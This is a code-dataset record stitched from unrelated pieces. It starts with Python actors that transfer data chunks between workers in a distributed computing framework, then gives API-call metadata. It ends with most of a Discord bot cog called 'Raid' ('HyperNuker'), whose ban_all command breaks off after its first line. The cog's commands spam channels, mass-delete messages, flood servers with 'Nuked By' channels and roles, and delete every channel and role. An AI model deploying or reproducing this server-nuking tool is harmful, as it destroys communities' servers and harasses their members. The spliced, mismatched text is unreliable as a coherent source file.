ref.create_data_writers(
session_id, chunk_keys, data_sizes, self.ref(), ensure_cached=ensure_cached,
timeout=timeout, pin_token=pin_token, _timeout=timeout, _promise=True
).then(_handle_created)
)
return promise.all_(create_write_promises).then(lambda *_: keys_to_readers)
@log_unhandled
def _handle_created(ref, statuses):
manager_ref = receiver_manager_ref_dict[ref.address]
# filter out endpoints already transferred or already started transfer
keys_receiving, keys_to_receive = [], []
for k, status in zip(chunk_keys, statuses):
if status == ReceiveStatus.RECEIVING:
keys_receiving.append(k)
elif status is None:
keys_to_receive.append(k)
if keys_to_receive:
addrs_to_chunks[ref.address] = keys_to_receive
receiver_refs.append(self.promise_ref(ref))
if keys_receiving:
wait_refs.append(manager_ref.add_keys_callback(
session_id, keys_receiving, _timeout=timeout, _promise=True))
@log_unhandled
def _finalize(*_):
self._dispatch_ref.register_free_slot(self.uid, 'sender', _tell=True)
self.tell_promise(callback, data_sizes)
@log_unhandled
def _handle_rejection(*exc):
logger.exception('Transfer chunks %r to %r failed', chunk_keys, target_endpoints, exc_info=exc)
self._dispatch_ref.register_free_slot(self.uid, 'sender', _tell=True)
for reader in keys_to_readers.values():
reader.close()
keys_to_readers.clear()
for ref in receiver_refs:
ref.cancel_receive(session_id, addrs_to_chunks[ref.address], _tell=True, _wait=False)
self.tell_promise(callback, *exc, _accept=False)
try:
if options.vineyard.socket:
source_devices = [DataStorageDevice.VINEYARD, DataStorageDevice.DISK] # pragma: no cover
else:
source_devices = [DataStorageDevice.SHARED_MEMORY, DataStorageDevice.DISK]
_create_local_readers().then(_create_remote_writers) \
.then(lambda *_: self._compress_and_send(
session_id, addrs_to_chunks, receiver_refs, keys_to_readers,
block_size=block_size, timeout=timeout,
)) \
.then(lambda *_: promise.all_(wait_refs)) \
.then(_finalize, _handle_rejection)
except: # noqa: E722
_handle_rejection(*sys.exc_info())
return
@log_unhandled
def _compress_and_send(self, session_id, addrs_to_chunks, receiver_refs, keys_to_readers,
block_size, timeout=None):
"""
Compress and send data to receivers in chunked manner
:param session_id: session id
:param addrs_to_chunks: dict mapping endpoints to chunks to send
:param receiver_refs: refs to send data to
"""
# collect data targets
chunks_to_addrs = defaultdict(set)
for addr, chunks in addrs_to_chunks.items():
for key in chunks:
chunks_to_addrs[key].add(addr)
all_chunk_keys = sorted(chunks_to_addrs.keys(), key=lambda k: len(chunks_to_addrs[k]))
addr_statuses = dict((k, EndpointTransferState()) for k in addrs_to_chunks.keys())
addr_to_refs = dict((ref.address, ref) for ref in receiver_refs)
# start compress and send data into targets
logger.debug('Data writer for chunks %r allocated at targets, start transmission', all_chunk_keys)
# filter out endpoints we need to send to
try:
if not receiver_refs:
self._dispatch_ref.register_free_slot(self.uid, 'sender', _tell=True, _wait=False)
return
cur_key_id = 0
cur_key = all_chunk_keys[cur_key_id]
cur_reader = keys_to_readers[cur_key]
with EventContext(self._events_ref, EventCategory.PROCEDURE, EventLevel.NORMAL,
ProcedureEventType.NETWORK, self.uid):
while cur_key_id < len(all_chunk_keys):
# read a data part from reader we defined above
pool = cur_reader.get_io_pool()
next_part = pool.submit(cur_reader.read, block_size).result()
file_eof = len(next_part) < block_size
for addr in chunks_to_addrs[cur_key]:
addr_status = addr_statuses[addr]
addr_status.parts.append(next_part)
addr_status.keys.append(cur_key)
addr_status.total_size += len(next_part)
addr_status.end_marks.append(file_eof)
if addr_status.total_size >= block_size:
if addr_status.send_future:
addr_status.send_future.result(timeout=timeout)
addr_status.send_future = addr_to_refs[addr].receive_data_part(
session_id, addr_status.keys, addr_status.end_marks,
*addr_status.parts, _wait=False)
addr_status.reset()
# when some part goes to end, move to the next chunk
if file_eof:
cur_reader.close()
cur_key_id += 1
if cur_key_id < len(all_chunk_keys):
# still some chunks left unhandled
cur_key = all_chunk_keys[cur_key_id]
cur_reader = keys_to_readers[cur_key]
else:
# all chunks handled
for addr, addr_status in addr_statuses.items():
if addr_status.send_future:
addr_status.send_future.result(timeout=timeout)
if addr_status.parts:
# send remaining chunks
addr_status.end_marks[-1] = True
addr_status.send_future = addr_to_refs[addr].receive_data_part(
session_id, addr_status.keys, addr_status.end_marks,
*addr_status.parts, _wait=False)
addr_status.reset()
for addr_status in addr_statuses.values():
if addr_status.send_future:
addr_status.send_future.result(timeout=timeout)
addr_status.reset()
except: # noqa: E722
for ref in receiver_refs:
ref.cancel_receive(session_id, addrs_to_chunks[ref.address], _tell=True, _wait=False)
raise
finally:
for reader in keys_to_readers.values():
reader.close()
class ReceiverDataMeta(object):
__slots__ = 'start_time', 'chunk_size', 'source_address',\
'status', 'transfer_event_id', 'receiver_worker_uid', \
'callback_ids', 'callback_args', 'callback_kwargs'
def __init__(self, start_time=None, chunk_size=None, source_address=None,
transfer_event_id=None, receiver_worker_uid=None, status=None,
callback_ids=None, callback_args=None, callback_kwargs=None):
self.start_time = start_time
self.chunk_size = chunk_size
self.source_address = source_address
self.status = status
self.transfer_event_id = transfer_event_id
self.receiver_worker_uid = receiver_worker_uid
self.callback_ids = callback_ids or []
self.callback_args = callback_args or ()
self.callback_kwargs = callback_kwargs or {}
def update(self, **kwargs):
kwargs['callback_ids'] = list(set(self.callback_ids) | set(kwargs.get('callback_ids') or ()))
for k, v in kwargs.items():
setattr(self, k, v)
class ReceiverManagerActor(WorkerActor):
def __init__(self):
super().__init__()
self._data_metas = dict()
self._max_callback_id = 0
self._callback_id_to_callbacks = dict()
self._callback_id_to_keys = dict()
self._dispatch_ref = None
def post_create(self):
super().post_create()
from .dispatcher import DispatchActor
self._dispatch_ref = self.promise_ref(DispatchActor.default_uid())
def _update_data_meta(self, session_id, data_key, **kwargs):
try:
self._data_metas[(session_id, data_key)].update(**kwargs)
except KeyError:
self._data_metas[(session_id, data_key)] = ReceiverDataMeta(**kwargs)
@promise.reject_on_exception
@log_unhandled
def create_data_writers(self, session_id, data_keys, data_sizes, sender_ref,
ensure_cached=True, pin_token=None, timeout=0,
use_promise=True, callback=None):
sender_address = None if sender_ref is None else sender_ref.address
logger.debug('Begin creating transmission data writer for chunks %r from %s',
data_keys, sender_address)
data_locations = dict(zip(
data_keys, self.storage_client.get_data_locations(session_id, data_keys)))
keys_to_fetch = []
sizes_to_fetch = []
statuses = []
slot_ref = self.promise_ref(self._dispatch_ref.get_hash_slot('receiver', repr(data_keys)))
for chunk_key, data_size in zip(data_keys, data_sizes):
session_chunk_key = (session_id, chunk_key)
try:
data_meta = self._data_metas[session_chunk_key]
except KeyError:
data_meta = self._data_metas[session_chunk_key] = \
ReceiverDataMeta(chunk_size=data_size, source_address=sender_address,
status=ReceiveStatus.NOT_STARTED)
if data_locations.get(chunk_key):
data_meta.status = ReceiveStatus.RECEIVED
statuses.append(ReceiveStatus.RECEIVED)
self._update_data_meta(session_id, chunk_key, status=ReceiveStatus.RECEIVED)
continue
elif data_meta.status == ReceiveStatus.RECEIVING:
# data transfer already started
logger.debug('Chunk %s already started transmission', chunk_key)
statuses.append(ReceiveStatus.RECEIVING)
continue
elif data_meta.status == ReceiveStatus.RECEIVED:
data_meta = self._data_metas[session_chunk_key] = \
ReceiverDataMeta(chunk_size=data_size, source_address=sender_address,
status=ReceiveStatus.NOT_STARTED)
data_meta.start_time = time.time()
data_meta.receiver_worker_uid = slot_ref.uid
data_meta.source_address = sender_address
data_meta.status = ReceiveStatus.RECEIVING
self._update_data_meta(session_id, chunk_key, chunk_size=data_size,
source_address=sender_address, status=ReceiveStatus.RECEIVING)
keys_to_fetch.append(chunk_key)
sizes_to_fetch.append(data_size)
statuses.append(None) # this notifies the sender to transmit data
if use_promise:
if keys_to_fetch:
slot_ref.create_data_writers(
session_id, keys_to_fetch, sizes_to_fetch, sender_ref, ensure_cached=ensure_cached,
timeout=timeout, pin_token=pin_token, use_promise=use_promise, _promise=True) \
.then(lambda *_: self.tell_promise(callback, slot_ref, statuses))
else:
self.tell_promise(callback, slot_ref, statuses)
else:
slot_ref.create_data_writers(
session_id, keys_to_fetch, sizes_to_fetch, sender_ref, ensure_cached=ensure_cached,
timeout=timeout, pin_token=pin_token, use_promise=use_promise)
return slot_ref, statuses
def register_pending_keys(self, session_id, data_keys):
for key in data_keys:
session_data_key = (session_id, key)
if session_data_key not in self._data_metas \
or self._data_metas[session_data_key].status == ReceiveStatus.ERROR:
self._update_data_meta(session_id, key, status=ReceiveStatus.PENDING,
callback_args=(), callback_kwargs={})
def filter_receiving_keys(self, session_id, data_keys):
keys = []
receiving_status = (ReceiveStatus.PENDING, ReceiveStatus.RECEIVING)
for k in data_keys:
try:
if self._data_metas[(session_id, k)].status in receiving_status:
keys.append(k)
except KeyError:
pass
return keys
def add_keys_callback(self, session_id, data_keys, callback):
cb_id = self._max_callback_id
self._max_callback_id += 1
receiving_status = (ReceiveStatus.PENDING, ReceiveStatus.RECEIVING)
registered_session_keys = []
args, kwargs = (), {}
for k in data_keys:
session_data_key = (session_id, k)
data_meta = self._data_metas[session_data_key] # type: ReceiverDataMeta
if data_meta.status in receiving_status:
registered_session_keys.append(session_data_key)
data_meta.callback_ids.append(cb_id)
else:
args, kwargs = data_meta.callback_args, data_meta.callback_kwargs
if registered_session_keys:
self._callback_id_to_callbacks[cb_id] = callback
self._callback_id_to_keys[cb_id] = set(registered_session_keys)
logger.debug('Callback for transferring %r registered', registered_session_keys)
else:
self._max_callback_id = cb_id
self.tell_promise(callback, *args, **kwargs)
def notify_keys_finish(self, session_id, data_keys, *args, **kwargs):
keys_to_clear = []
for data_key in data_keys:
session_data_key = (session_id, data_key)
try:
data_meta = self._data_metas[session_data_key] # type: ReceiverDataMeta
except KeyError:
logger.debug('Record of %s not found.', data_key)
continue
try:
data_meta.callback_args = args
data_meta.callback_kwargs = kwargs
if kwargs.get('_accept', True):
data_meta.status = ReceiveStatus.RECEIVED
else:
data_meta.status = ReceiveStatus.ERROR
cb_ids = data_meta.callback_ids
data_meta.callback_ids = []
if not cb_ids:
continue
kwargs['_wait'] = False
notified = 0
for cb_id in cb_ids:
cb_keys = self._callback_id_to_keys[cb_id]
cb_keys.remove(session_data_key)
if not cb_keys:
del self._callback_id_to_keys[cb_id]
cb = self._callback_id_to_callbacks.pop(cb_id)
notified += 1
self.tell_promise(cb, *args, **kwargs)
logger.debug('%d transfer listeners of %s notified.', notified, data_key)
finally:
if data_meta.status == ReceiveStatus.RECEIVED:
keys_to_clear.append(data_key)
self.ref().clear_keys(session_id, keys_to_clear, _tell=True, _delay=5)
def clear_keys(self, session_id, keys):
for k in keys:
self._data_metas.pop((session_id, k), None)
class ReceiverWorkerActor(WorkerActor):
"""
Actor handling receiving data from a SenderActor
"""
def __init__(self):
super().__init__()
self._chunk_holder_ref = None
self._dispatch_ref = None
self._receiver_manager_ref = None
self._events_ref = None
self._status_ref = None
self._data_writers = dict()
self._writing_futures = dict()
self._data_metas = dict()
def post_create(self):
from .events import EventsActor
from .status import StatusActor
from .dispatcher import DispatchActor
super().post_create()
self._events_ref = self.ctx.actor_ref(EventsActor.default_uid())
if not self.ctx.has_actor(self._events_ref):
self._events_ref = None
self._status_ref = self.ctx.actor_ref(StatusActor.default_uid())
if not self.ctx.has_actor(self._status_ref):
self._status_ref = None
self._receiver_manager_ref = self.ctx.actor_ref(ReceiverManagerActor.default_uid())
if not self.ctx.has_actor(self._receiver_manager_ref):
self._receiver_manager_ref = None
self._dispatch_ref = self.promise_ref(DispatchActor.default_uid())
self._dispatch_ref.register_free_slot(self.uid, 'receiver')
@log_unhandled
def check_status(self, session_id, chunk_key):
"""
Check if data exists or is being transferred in the target worker
:param session_id: session id
:param chunk_key: chunk key
"""
session_chunk_key = (session_id, chunk_key)
if self.storage_client.get_data_locations(session_id, [chunk_key])[0]:
return ReceiveStatus.RECEIVED
if session_chunk_key in self._data_writers:
# data still being transferred
return ReceiveStatus.RECEIVING
return ReceiveStatus.NOT_STARTED
@promise.reject_on_exception
@log_unhandled
def create_data_writers(self, session_id, chunk_keys, data_sizes, sender_ref,
ensure_cached=True, timeout=0, pin_token=None,
use_promise=True, callback=None):
"""
Create a data writer for subsequent data transfer. The writer can either work on
shared storage or spill.
:param session_id: session id
:param chunk_keys: chunk keys
:param data_sizes: uncompressed data sizes
:param sender_ref: ActorRef of SenderActor
:param ensure_cached: if True, the data should be stored in shared memory,
otherwise spill is acceptable
:param timeout: timeout if the chunk receiver does not close
:param pin_token: token to pin the data
:param use_promise: if True, we use promise callback to notify accomplishment
of writer creation, otherwise the function returns directly
and when sill is needed, a StorageFull will be raised instead.
:param callback: promise callback
"""
promises = []
failed = False
if options.vineyard.socket:
device_order = [DataStorageDevice.VINEYARD] # pragma: no cover
else:
device_order = [DataStorageDevice.SHARED_MEMORY]
source_address = sender_ref.address if sender_ref is not None else None
if not ensure_cached:
device_order += [DataStorageDevice.DISK]
def _handle_accept_key(key, writer):
if failed:
writer.close(finished=False)
else:
self._data_writers[(session_id, key)] = writer
@log_unhandled
def _handle_reject_key(key, *exc):
nonlocal failed
if self.check_status(session_id, key) == ReceiveStatus.RECEIVED:
logger.debug('Chunk %s already received', key)
else:
logger.debug('Rejecting %s from putting into plasma.', key)
failed = True
self._stop_transfer_with_exc(session_id, chunk_keys, exc)
if callback is not None:
self.tell_promise(callback, *exc, _accept=False)
# configure timeout callback
if timeout:
self.ref().handle_receive_timeout(session_id, chunk_keys, _delay=timeout, _tell=True)
for chunk_key, data_size in zip(chunk_keys, data_sizes):
self._data_metas[(session_id, chunk_key)] = ReceiverDataMeta(
start_time=time.time(), chunk_size=data_size, source_address=source_address)
use_device_order = device_order \
if not isinstance(chunk_key, tuple) or not options.worker.write_shuffle_to_disk \
else [DataStorageDevice.DISK]
if use_promise:
promises.append(self.storage_client.create_writer(
session_id, chunk_key, data_size, use_device_order, packed=True,
pin_token=pin_token, _promise=True)
.then(functools.partial(_handle_accept_key, chunk_key),
functools.partial(_handle_reject_key, chunk_key)))
else:
try:
_writer = self.storage_client.create_writer(
session_id, chunk_key, data_size, use_device_order, packed=True,
pin_token=pin_token, _promise=False)
_handle_accept_key(chunk_key, _writer)
return self.address, None
except: # noqa: E722
_handle_reject_key(chunk_key, *sys.exc_info())
raise
promise.all_(promises).then(lambda *_: self.tell_promise(callback))
def _wait_unfinished_writing(self, session_id, data_key):
try:
self._writing_futures[(session_id, data_key)].result()
del self._writing_futures[(session_id, data_key)]
except KeyError:
pass
@log_unhandled
def receive_data_part(self, session_id, chunk_keys, end_marks, *data_parts):
"""
Receive data part from sender
:param session_id: session id
:param chunk_keys: chunk keys
:param end_marks: array with same number of boolean elements as chunk keys.
if one element is True, the corresponding data in data_parts
is the last part of the chunk.
:param data_parts: data parts to be written
"""
try:
finished_keys, finished_meta_keys, finished_metas = [], [], []
for chunk_key, data_part, end_mark in zip(chunk_keys, data_parts, end_marks):
self._wait_unfinished_writing(session_id, chunk_key)
session_chunk_key = (session_id, chunk_key)
try:
data_meta = self._data_metas[session_chunk_key] # type: ReceiverDataMeta
# if error occurred, interrupts
if data_meta.status == ReceiveStatus.ERROR:
raise data_meta.callback_args[1].with_traceback(data_meta.callback_args[2])
writer = self._data_writers[session_chunk_key]
pool = writer.get_io_pool()
self._writing_futures[session_chunk_key] = pool.submit(
writer.write, data_part)
if end_mark:
finished_keys.append(chunk_key)
if not isinstance(chunk_key, tuple):
finished_meta_keys.append(chunk_key)
finished_metas.append(WorkerMeta(chunk_size=data_meta.chunk_size,
workers=(self.address,)))
except: # noqa: E722
self._stop_transfer_with_exc(session_id, chunk_keys, sys.exc_info())
raise
if finished_keys:
for chunk_key in finished_keys:
session_chunk_key = (session_id, chunk_key)
data_meta = self._data_metas[session_chunk_key] # type: ReceiverDataMeta
self._wait_unfinished_writing(session_id, chunk_key)
# update transfer speed stats
if self._status_ref:
time_delta = time.time() - data_meta.start_time
self._status_ref.update_mean_stats(
'net_transfer_speed', data_meta.chunk_size * 1.0 / time_delta,
_tell=True, _wait=False)
self._data_writers[session_chunk_key].close()
data_meta.status = ReceiveStatus.RECEIVED
logger.debug('Transfer for data %s finished.', chunk_key)
del self._data_writers[session_chunk_key]
self._invoke_finish_callbacks(session_id, finished_keys)
if finished_meta_keys:
self.get_meta_client().batch_set_chunk_meta(session_id, finished_meta_keys, finished_metas)
finally:
del data_parts
def _is_receive_running(self, session_id, chunk_key):
receive_done_statuses = (ReceiveStatus.ERROR, ReceiveStatus.RECEIVED)
try:
return self._data_metas[(session_id, chunk_key)].status not in receive_done_statuses
except KeyError:
return False
@log_unhandled
def cancel_receive(self, session_id, chunk_keys, exc_info=None):
"""
Cancel data receive by returning an ExecutionInterrupted
:param session_id: session id
:param chunk_keys: chunk keys
:param exc_info: exception to raise
"""
receiving_keys = []
for k in chunk_keys:
if self._is_receive_running(session_id, k):
receiving_keys.append(k)
self._wait_unfinished_writing(session_id, k)
logger.debug('Transfer for %r cancelled.', chunk_keys)
if exc_info is None:
exc_info = build_exc_info(ExecutionInterrupted)
self._stop_transfer_with_exc(session_id, receiving_keys, exc_info)
@log_unhandled
def notify_dead_senders(self, dead_workers):
"""
When some peer workers are dead, corresponding receivers will be cancelled
:param dead_workers: endpoints of dead workers
"""
dead_workers = set(dead_workers)
exc_info = build_exc_info(WorkerDead)
session_to_keys = defaultdict(set)
for session_chunk_key in self._data_writers.keys():
if self._data_metas[session_chunk_key].source_address in dead_workers:
session_to_keys[session_chunk_key[0]].add(session_chunk_key[1])
for session_id, data_keys in session_to_keys.items():
self.ref().cancel_receive(session_id, list(data_keys), exc_info=exc_info, _tell=True)
@log_unhandled
def handle_receive_timeout(self, session_id, chunk_keys):
if not any(self._is_receive_running(session_id, k) for k in chunk_keys):
# if transfer already finishes, no needs to report timeout
return
logger.debug('Transfer for %r timed out, cancelling.', chunk_keys)
self._stop_transfer_with_exc(session_id, chunk_keys, build_exc_info(TimeoutError))
def _stop_transfer_with_exc(self, session_id, chunk_keys, exc):
for chunk_key in chunk_keys:
self._wait_unfinished_writing(session_id, chunk_key)
if not isinstance(exc[1], ExecutionInterrupted):
logger.exception('Error occurred in receiving %r. Cancelling transfer.',
chunk_keys, exc_info=exc)
for chunk_key in chunk_keys:
session_chunk_key = (session_id, chunk_key)
# stop and close data writer
try:
# transfer is not finished yet, we need to clean up unfinished stuffs
self._data_writers[session_chunk_key].close(finished=False)
del self._data_writers[session_chunk_key]
except KeyError:
# transfer finished and writer cleaned, no need to clean up
pass
try:
data_meta = self._data_metas[session_chunk_key] # type: ReceiverDataMeta
data_meta.status = ReceiveStatus.ERROR
except KeyError:
pass
self._invoke_finish_callbacks(session_id, chunk_keys, *exc, **dict(_accept=False))
def _invoke_finish_callbacks(self, session_id, chunk_keys, *args, **kwargs):
# invoke registered callbacks for chunk
for k in chunk_keys:
try:
data_meta = self._data_metas.pop((session_id, k)) # type: ReceiverDataMeta
except KeyError:
continue
if data_meta.transfer_event_id is not None and self._events_ref is not None:
self._events_ref.close_event(data_meta.transfer_event_id, _tell=True, _wait=False)
if not kwargs.get('_accept', True):
if not data_meta.callback_args or data_meta.callback_args[0] is ExecutionInterrupted:
data_meta.callback_args = args
data_meta.callback_kwargs = kwargs
else:
args = data_meta.callback_args
kwargs = data_meta.callback_kwargs
else:
data_meta.callback_args = args
data_meta.callback_kwargs = kwargs
kwargs['_tell'] = True
if self._receiver_manager_ref:
self._receiver_manager_ref.notify_keys_finish(session_id, chunk_keys, *args, **kwargs)
class ResultCopyActor(WorkerActor):
def start_copy(self, session_id, chunk_key, targets):
locations = [v[1] for v in self.storage_client.get_data_locations(session_id, [chunk_key])[0]]
if set(locations).intersection(targets):
return
ev = self.ctx.event()
self.storage_client.copy_to(session_id, [chunk_key], targets) \
.then(lambda *_: ev.set())
return ev
class ResultSenderActor(WorkerActor):
"""
Actor handling sending result to user client
"""
def __init__(self):
super().__init__()
self._result_copy_ref = None
self._serialize_pool = None
def post_create(self):
super().post_create()
self._serialize_pool = self.ctx.threadpool(1)
self._result_copy_ref = self.ctx.create_actor(ResultCopyActor, uid=ResultCopyActor.default_uid())
def pre_destroy(self):
self._result_copy_ref.destroy()
super().pre_destroy()
def fetch_batch_data(self, session_id, chunk_keys, index_objs=None, compression_type=None):
results = []
if index_objs is not None:
for chunk_key, index_obj in zip(chunk_keys, index_objs):
results.append(self.fetch_data(session_id, chunk_key, index_obj, compression_type=compression_type))
else:
for chunk_key in chunk_keys:
results.append(self.fetch_data(session_id, chunk_key, compression_type=compression_type))
return results
def fetch_data(self, session_id, chunk_key, index_obj=None, compression_type=None):
if compression_type is None:
compression_type = dataserializer.CompressType(options.worker.transfer_compression)
if index_obj is None:
if options.vineyard.socket:
target_devs = [DataStorageDevice.VINEYARD, DataStorageDevice.DISK] # pragma: no cover
else:
target_devs = [DataStorageDevice.SHARED_MEMORY, DataStorageDevice.DISK]
ev = self._result_copy_ref.start_copy(session_id, chunk_key, target_devs)
if ev:
ev.wait(options.worker.prepare_data_timeout)
reader = self.storage_client.create_reader(
session_id, chunk_key, target_devs, packed=True,
packed_compression=compression_type, _promise=False)
with reader:
pool = reader.get_io_pool()
return pool.submit(reader.read).result()
else:
try:
if options.vineyard.socket:
memory_device = DataStorageDevice.VINEYARD # pragma: no cover
else:
memory_device = DataStorageDevice.SHARED_MEMORY
value = self.storage_client.get_object(
session_id, chunk_key, [memory_device], _promise=False)
except IOError:
reader = self.storage_client.create_reader(
session_id, chunk_key, [DataStorageDevice.DISK], packed=False, _promise=False)
with reader:
pool = reader.get_io_pool()
value = dataserializer.deserialize(pool.submit(reader.read).result())
try:
sliced_value = value.iloc[tuple(index_obj)]
except AttributeError:
sliced_value = value[tuple(index_obj)]
return self._serialize_pool.submit(
dataserializer.dumps, sliced_value, compress=compression_type).result()
def put_remote_chunk(session_id, chunk_key, data, receiver_manager_ref):
"""
Put a chunk to target machine using given receiver_ref
"""
from .dataio import ArrowBufferIO
buf = dataserializer.serialize(data).to_buffer()
receiver_ref, _ = receiver_manager_ref.create_data_writers(
session_id, [chunk_key], [buf.size], None, ensure_cached=False, use_promise=False)
receiver_ref = receiver_manager_ref.ctx.actor_ref(receiver_ref)
block_size = options.worker.transfer_block_size
reader = None
try:
reader = ArrowBufferIO(buf, 'r', block_size=block_size)
futures = []
while True:
next_part = reader.read(block_size)
is_last = not next_part or len(next_part) < block_size
[f.result() for f in futures]
futures.append(receiver_ref.receive_data_part(
session_id, [chunk_key], [is_last], next_part, _wait=False))
if is_last:
[f.result() for f in futures]
break
except: # noqa: E722
receiver_ref.cancel_receive(session_id, [chunk_key])
raise
finally:
if reader:
reader.close()
del reader
|
[
"functools.partial",
"time.time",
"collections.defaultdict",
"sys.exc_info",
"logging.getLogger"
] |
[((1146, 1173), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1163, 1173), False, 'import logging\n'), ((8004, 8020), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (8015, 8020), False, 'from collections import defaultdict\n'), ((31489, 31505), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (31500, 31505), False, 'from collections import defaultdict\n'), ((15972, 15983), 'time.time', 'time.time', ([], {}), '()\n', (15981, 15983), False, 'import time\n'), ((25494, 25505), 'time.time', 'time.time', ([], {}), '()\n', (25503, 25505), False, 'import time\n'), ((4313, 4368), 'functools.partial', 'functools.partial', (['operator.setitem', 'keys_to_readers', 'k'], {}), '(operator.setitem, keys_to_readers, k)\n', (4330, 4368), False, 'import functools\n'), ((7496, 7510), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (7508, 7510), False, 'import sys\n'), ((26013, 26061), 'functools.partial', 'functools.partial', (['_handle_accept_key', 'chunk_key'], {}), '(_handle_accept_key, chunk_key)\n', (26030, 26061), False, 'import functools\n'), ((26089, 26137), 'functools.partial', 'functools.partial', (['_handle_reject_key', 'chunk_key'], {}), '(_handle_reject_key, chunk_key)\n', (26106, 26137), False, 'import functools\n'), ((28860, 28874), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (28872, 28874), False, 'import sys\n'), ((29341, 29352), 'time.time', 'time.time', ([], {}), '()\n', (29350, 29352), False, 'import time\n'), ((26588, 26602), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (26600, 26602), False, 'import sys\n')]
|
# By Snu
# The creator is not responsible for misuse
"""
MIT License
Copyright (c) 2022 Snu
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from asyncio import get_running_loop
from discord.ext import commands
from discord import Permissions
from colorama import Fore, Style
from random import choice
from json import loads
from datetime import datetime
with open("files/config.json") as file:
content = loads(file.read())
class Raid(commands.Cog):
def __init__(self, client):
self.client = client
self.time = lambda: datetime.now().strftime('%H:%M:%S')
self.nomes = content["nomes"] if content["nomes"] != [] else [""]
@commands.command(aliases=content["spam"][1:])
async def spam(self, ctx, repeat:int, *, msg):
cmd = ctx.invoked_with.lower()
count = 0
for i in range(repeat):
try:
await ctx.channel.send(content=msg)
print(f"{Fore.YELLOW}[{cmd.upper()}] Mensagem enviada com sucesso "
f"no canal -> {ctx.channel.id} - {self.time()}{Style.RESET_ALL}")
count += 1
except: print(f"{Fore.RED}[{cmd.upper()}] Erro ao enviar a mensagem "
f"no canal -> {ctx.channel.id} - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Mensagem(ns) enviada(s) com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["purge"][1:])
async def purge(self, ctx, limit:int=100):
cmd = ctx.invoked_with.lower()
count = count_error = 0
async for message in ctx.channel.history(limit=limit):
try:
await message.delete()
print(f"{Fore.YELLOW}[{cmd.upper()}] Mensagem -> {message.id} deletada - {self.time()}{Style.RESET_ALL}")
count += 1
except:
print(f"{Fore.RED}[{cmd.upper()}] Não foi possível apagar a mensagem -> {message.id} - {self.time()}{Style.RESET_ALL}")
count_error += 1
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Mensagem(ns) apagada(s) com sucesso - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.RED}[{cmd.upper()}] {count} Mensagem(ns) não foram apagada(s) com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["create_channels"][1:])
@commands.has_permissions(manage_channels=True)
async def create_channels(self, ctx, limit:int=100):
cmd = ctx.invoked_with.lower()
count = 0
for i in range(limit):
nome = choice(self.nomes)
if nome == "":
nome = choice([f"Nuked By {self.client.user.name}", "Nuked with HyperNuker"])
try:
await ctx.guild.create_text_channel(nome)
print(f"{Fore.YELLOW}[{cmd.upper()}] Um canal foi criado com sucesso - {self.time()}{Style.RESET_ALL}")
count += 1
except: print(f"{Fore.RED}[{cmd.upper()}] Erro ao criar um canal - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Canais foram criado com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["delete_channels"][1:])
@commands.has_permissions(manage_channels=True)
async def delete_channels(self, ctx):
cmd = ctx.invoked_with.lower()
count = 0
channels = ctx.guild.channels
for channel in channels:
try:
await channel.delete()
print(f"{Fore.YELLOW}[{cmd.upper()}] Um canal foi excluído com sucesso - {self.time()}{Style.RESET_ALL}")
count += 1
except: print(f"{Fore.RED}[{cmd.upper()}] Erro ao excluir um canal - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Canal(is) deletado(s) com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["create_roles"][1:])
@commands.has_permissions(manage_roles=True)
async def create_roles(self, ctx, limit:int=50):
cmd = ctx.invoked_with.lower()
count = 0
for i in range(limit):
nome = choice(self.nomes)
if nome == "":
nome = choice([f"Nuked By {self.client.user.name}", "Nuked with HyperNuker"])
try:
await ctx.guild.create_role(name=nome)
print(f"{Fore.YELLOW}[{cmd.upper()}] Um cargo foi criado com sucesso - {self.time()}{Style.RESET_ALL}")
count += 1
except: print(f"{Fore.RED}[{cmd.upper()}] Erro ao criar um cargo - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Cargo(s) criados(s) com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["delete_roles"][1:])
@commands.has_permissions(manage_roles=True)
async def delete_roles(self, ctx):
cmd = ctx.invoked_with.lower()
count = 0
roles = ctx.guild.roles
for role in roles:
try:
await role.delete()
print(f"{Fore.YELLOW}[{cmd.upper()}] Um cargo foi excluído com sucesso - {self.time()}{Style.RESET_ALL}")
count += 1
except: print(f"{Fore.RED}[{cmd.upper()}] Erro ao excluir um cargo - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Cargo(s) excluído(s) com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["ban_all"][1:])
@commands.has_permissions(ban_members=True)
async def ban_all(self, ctx):
cmd = ctx.invoked_with.lower()
